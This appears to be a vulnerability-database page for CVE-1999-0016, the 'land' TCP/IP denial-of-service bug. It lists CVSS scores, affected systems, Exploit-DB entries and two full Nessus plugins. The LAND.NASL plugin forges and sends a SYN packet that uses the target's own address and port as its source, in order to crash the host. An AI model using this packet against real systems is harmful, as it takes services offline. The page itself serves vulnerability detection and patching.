Vulnerabilities > CVE-1999-0016

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

NONE

Integrity impact

NONE

Availability impact

PARTIAL

network

low complexity

nessus

exploit available

NVD

Published: 1997-12-01

Updated: 2008-09-09

Summary

Land IP denial of service.

Vulnerable Configurations

Part	Description	Count
OS	Cisco Cisco IOS 7000	1
OS	Hp HP HP UX 9.00 HP HP UX 9.01 HP HP UX 9.03 HP HP UX 9.04 HP HP UX 9.05 HP HP UX 9.07 HP HP UX 10.00 HP HP UX 10.01 HP HP UX 10.10 HP HP UX 10.16 HP HP UX 10.20 HP HP UX 10.24 HP HP UX 10.30 HP HP UX 11.00	14
OS	Microsoft Microsoft Windows 95 * Microsoft Windows NT 4.0	2
OS	Netbsd Netbsd Netbsd 1.0 Netbsd Netbsd 1.1	2
OS	Sun SUN Sunos 4.1.3U1 SUN Sunos 4.1.4	2
Application	Gnu GNU Inet 5.01	1
Application	Microsoft Microsoft Winsock 2.0	1

Exploit-Db

description	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5). CVE-1999-0016. Dos exploit for windows platform
id	EDB-ID:20814
last seen	2016-02-02
modified	1997-11-20
published	1997-11-20
reporter	Dejan Levaja
source	https://www.exploit-db.com/download/20814/
title	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 - loopback land.c DoS 5

description	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1). CVE-1999-0016. Dos exploits for multiple platform
id	EDB-ID:20810
last seen	2016-02-02
modified	1997-11-20
published	1997-11-20
reporter	m3lt
source	https://www.exploit-db.com/download/20810/
title	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 - loopback land.c DoS 1

description	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3). CVE-1999-0016. Dos exploit for windows platform
id	EDB-ID:20812
last seen	2016-02-02
modified	1997-11-20
published	1997-11-20
reporter	m3lt
source	https://www.exploit-db.com/download/20812/
title	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 - loopback land.c DoS 3

description	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2). CVE-1999-0016. Dos exploits for multiple platform
id	EDB-ID:20811
last seen	2016-02-02
modified	1997-11-20
published	1997-11-20
reporter	Konrad Malewski
source	https://www.exploit-db.com/download/20811/
title	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 - loopback land.c DoS 2

description	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4). CVE-1999-0016. Dos exploits for multiple platform
id	EDB-ID:20813
last seen	2016-02-02
modified	1997-11-20
published	1997-11-20
reporter	MondoMan
source	https://www.exploit-db.com/download/20813/
title	FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 - loopback land.c DoS 4

Nessus

NASL family	HP-UX Local Security Checks
NASL id	HPUX_PHNE_14017.NASL
description	s700_800 11.00 cumulative ARPA Transport patch : A TCP SYN packet with target host
last seen	2020-06-01
modified	2020-06-02
plugin id	16850
published	2005-02-16
reporter	This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/16850
title	HP-UX PHNE_14017 : s700_800 11.00 cumulative ARPA Transport patch
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and patch checks in this plugin were # extracted from HP patch PHNE_14017. The text itself is # copyright (C) Hewlett-Packard Development Company, L.P. # include("compat.inc"); if (description) { script_id(16850); script_version("$Revision: 1.12 $"); script_cvs_date("$Date: 2013/04/20 00:32:52 $"); script_cve_id("CVE-1999-0016"); script_xref(name:"HP", value:"HPSBUX9801-076"); script_name(english:"HP-UX PHNE_14017 : s700_800 11.00 cumulative ARPA Transport patch"); script_summary(english:"Checks for the patch in the swlist output"); script_set_attribute( attribute:"synopsis", value:"The remote HP-UX host is missing a security-related patch." ); script_set_attribute( attribute:"description", value: "s700_800 11.00 cumulative ARPA Transport patch : A TCP SYN packet with target host's address as both source and destination can cause system hangs." ); script_set_attribute( attribute:"solution", value:"Install patch PHNE_14017 or subsequent." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:hp:hp-ux"); script_set_attribute(attribute:"patch_publication_date", value:"1998/02/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/02/16"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc."); script_family(english:"HP-UX Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/HP-UX/version", "Host/HP-UX/swlist"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("hpux.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/HP-UX/version")) audit(AUDIT_OS_NOT, "HP-UX"); if (!get_kb_item("Host/HP-UX/swlist")) audit(AUDIT_PACKAGE_LIST_MISSING); if (!hpux_check_ctx(ctx:"11.00")) { exit(0, "The host is not affected since PHNE_14017 applies to a different OS release."); } patches = make_list("PHNE_14017", "PHNE_14279", "PHNE_14702", "PHNE_15047", "PHNE_15583", "PHNE_15692", "PHNE_15995", "PHNE_16283", "PHNE_16645", "PHNE_17017", "PHNE_17446", "PHNE_17662", "PHNE_18554", "PHNE_18611", "PHNE_18708", "PHNE_19110", "PHNE_19375", "PHNE_19899", "PHNE_20436", "PHNE_20735", "PHNE_21767", "PHNE_22397", "PHNE_23456", "PHNE_24715", "PHNE_25423", "PHNE_26771", "PHNE_27886", "PHNE_28538", "PHNE_29473", "PHNE_32041", "PHNE_33395", "PHNE_35729"); foreach patch (patches) { if (hpux_installed(app:patch)) { exit(0, "The host is not affected because patch "+patch+" is installed."); } } flag = 0; if (hpux_check_patch(app:"Networking.NET2-KRN", version:"B.11.00")) flag++; if (hpux_check_patch(app:"OS-Core.CORE2-KRN", version:"B.11.00")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");

NASL family	Denial of Service
NASL id	LAND.NASL
description	It was possible to make the remote server crash using the
last seen	2020-06-01
modified	2020-06-02
plugin id	10133
published	1999-06-22
reporter	This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10133
title	TCP/IP SYN Loopback Request Remote DoS (land.c)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10133); script_version("1.33"); script_cvs_date("Date: 2018/11/15 20:50:21"); script_cve_id("CVE-1999-0016"); script_bugtraq_id(2666); script_name(english:"TCP/IP SYN Loopback Request Remote DoS (land.c)"); script_summary(english:"Crashes the remote host using the 'land' attack"); script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a denial of service vulnerability."); script_set_attribute(attribute:"description", value: "It was possible to make the remote server crash using the 'land' attack. An attacker may use this flaw to shut down this server, thus preventing your network from working properly."); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e5a70096"); script_set_attribute(attribute:"solution", value:"Contact your operating system vendor for a patch."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"1997/12/17"); script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_KILL_HOST); script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc."); script_family(english:"Denial of Service"); script_require_keys("Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); if ( TARGET_IS_IPV6 ) exit(0); addr = get_host_ip(); ip = forge_ip_packet( ip_v : 4, ip_hl : 5, ip_tos : 0, ip_len : 20, ip_id : 0xF1C, ip_p : IPPROTO_TCP, ip_ttl : 255, ip_off : 0, ip_src : addr); port = get_host_open_port(); if(!port)exit(0); # According to # From: "Seeker of Truth" <[email protected]> # To: [email protected] # Subject: Fore/Marconi ATM Switch 'land' vulnerability # Date: Fri, 14 Jun 2002 23:35:41 +0000 # Message-ID: <[email protected]> # Fore/Marconi ATM Switch FT6.1.1 and FT7.0.1 are vulnerable to a land # attack against port 23. tcpip = forge_tcp_packet( ip : ip, th_sport : port, th_dport : port, th_flags : TH_SYN, th_seq : 0xF1C, th_ack : 0, th_x2 : 0, th_off : 5, th_win : 2048, th_urp : 0); # # Ready to go... # start_denial(); send_packet(tcpip, pcap_active:FALSE); sleep(5); alive = end_denial(); if(!alive){ set_kb_item(name:"Host/dead", value:TRUE); security_warning(0); }

References

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9801-076

Vulnerabilities > CVE-1999-0016 {"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Vulnerabilities","item":"https://cyber.vumetric.com/vulns/"},{"@type":"ListItem","position":2,"name":"CVE-1999-0016"}]}

Summary

Vulnerable Configurations

Exploit-Db

Nessus

References

Vulnerabilities > CVE-1999-0016